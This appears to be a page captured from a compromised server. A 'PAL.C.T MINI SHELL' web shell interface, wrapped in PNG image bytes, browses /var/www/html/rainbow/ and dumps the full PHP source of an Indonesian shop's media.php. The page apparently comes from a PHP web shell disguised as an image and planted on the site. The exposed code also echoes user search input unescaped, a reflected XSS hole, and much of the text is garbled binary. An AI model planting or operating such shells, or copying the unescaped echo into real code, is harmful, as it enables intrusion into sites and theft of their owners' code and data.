php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/rainbow/
upload
files >> /var/www/html/rainbow/media.php

<?php
	session_start();	
	include "../config/koneksi.php";
	include "../config/fungsi_rupiah.php";
	include "../config/class_paging.php";
	include "config/subdomain.php";
	include "../config/fungsi_seo.php";
	//include "../config/fungsi_ip.php";
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title><?php echo $nama_brands; ?> | faedahteknik.com</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <?php
		header('Cache-Control: max-age=900');
		?>
  <meta name="description" content="<?php echo $nama_brands; ?>">
  <meta name="keywords" content="<?php echo $seo_brand; ?>">
  <meta name="author" content="Cakra Danu Sedayu">

	<!--link rel="stylesheet/less" href="less/bootstrap.less" type="text/css" /-->
	<!--link rel="stylesheet/less" href="less/responsive.less" type="text/css" /-->
	<!--script src="js/less-1.3.3.min.js"></script-->
	<!--append ‘#!watch’ to the browser URL, then refresh the page. -->
	
	<link href="<?php echo $base_url; ?>asset/css/bootstrap.min.css" rel="stylesheet">
	<link href="<?php echo $base_url; ?>asset/css/bootstrap-responsive.min.css" rel="stylesheet">
	<link href="<?php echo $base_url; ?>subdomain/fixed/style.css" rel="stylesheet">
	<style type="text/css">
		body{
			background: url("<?php echo $background; ?>") repeat;
		}
		.main{
			padding: 30px 15px;
		}
		 /* Large desktop */
    	@media (min-width: 1200px) { 
    		.container{
    			width: 960px;
    		}
    	 }
    	 .keranjang-belanja-box{
    	 	text-align: right;
    	 	
    	 }
    	 .keranjang-belanja-box a{
    	 	color: #fff;
    	 	
    	 }
    	 .header{
    	 	margin-bottom: 10px;
    	 }    	 
	</style>
</head>
<body >
	<div class='header' style='background : #014EA2; color:#fff;'>
		<div class='container' style='padding:10px;'>
			<div class='row'>
				<div class='col-md-6'>
					<a href="<?php echo $base_url."rainbow"; ?>" >
						<img src="<?php echo $foto_brand; ?>" style='max-height:120px;'>
					</a>
				</div>
				<div class='col-md-6'>
					
					<div class='keranjang-belanja-box'>

						<?php include "../keranjang-belanja.php"; ?>


					</div>
				</div>
			</div>
		</div>
	</div>
	<div class="main container" style='background : #fff;'>
		<div class='row'>
			<?php
			if($_POST['cari_produk'] != "")
			{
				$kata_cari = $_POST['cari_produk'];
			}
			else{
				$kata_cari = $_GET['cari'];
				$_POST[jenis] = "nama";
			}
			?>
			<div class='col-md-6'>
				<form action='' method='POST'>
					<!-- <input type='text' name='cari_produk' Placeholder='Cari Produk' class='form-control'> -->
					<div class="input-group">
				      <input type="text" name='cari_produk' id='cari_produk' class="form-control" value='<?php echo $kata_cari; ?>' required placeholder="Cari Produk" autocomplete="off" >
				      <span class="input-group-btn">
				        <button class="btn btn-success" type="submit">Cari</button>
				      </span>
				    </div>
				</form>
			</div>
			<div class='col-md-3'>
				<!-- <form action='' method='POST'>
					<input type='hidden' value='<?php echo $kata_cari; ?>' name='cari_produk'>
					<select name='sort_harga' Onchange='this.form.submit()' class='form-control'>
						<option value=''> SORT Harga </option>
						<option value='ASC' <?php if($_POST['sort_harga'] == "ASC"){ echo "selected"; } ?>> Termurah - Termahal </option>
						<option value='DESC' <?php if($_POST['sort_harga'] == "DESC"){ echo "selected"; } ?>> Termahal - Termurah </option>
					</select>
				</form> -->
			</div>
			<div class='col-md-3'>
				<!-- <form action='' method='POST'>
					<input type='hidden' value='<?php echo $kata_cari; ?>' name='cari_produk'>
					<select name='sort_terbaru' Onchange='this.form.submit()' class='form-control'>
						<option value=''> SORT Terbaru </option>
						<option value='DESC' <?php if($_POST['sort_terbaru'] == "DESC"){ echo "selected"; } ?>> Terbaru - Terlama </option>
						<option value='ASC' <?php if($_POST['sort_terbaru'] == "ASC"){ echo "selected"; } ?>> Terlama - Terbaru </option>
					</select>
				</form> -->
			</div>
		</div>
		<hr>
		<div class='row'>
			
			<?php

				if ($_GET['module'] == 'home' OR $_GET['module'] == 'pencarian'){
	 	
				 	include "home.php";
				 } 
				 elseif($_GET['module'] == 'email')
				 {
				 	include "paket_detail/email.php";
					}
				 elseif($_GET['module'] == 'aksiemail')
				 {
				 	include "paket_detail/email_aksi.php";
					}

			?>

		</div>
	<br>
	<div class='footer' style='background: #68B6E6;'>
		<div class='container'>
			<br>
			Copyright © 2014 Faedah. All Rights Reserved. <br><br><br> <!-- C'ds <a href="zoneordering.net">zoneordering.net</a> -->
 		</div>
	</div>
	<?php
		
    //echo "session_id : ".session_id()."<br> IP Address : ".get_client_ip();
	?> 
	
</body>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`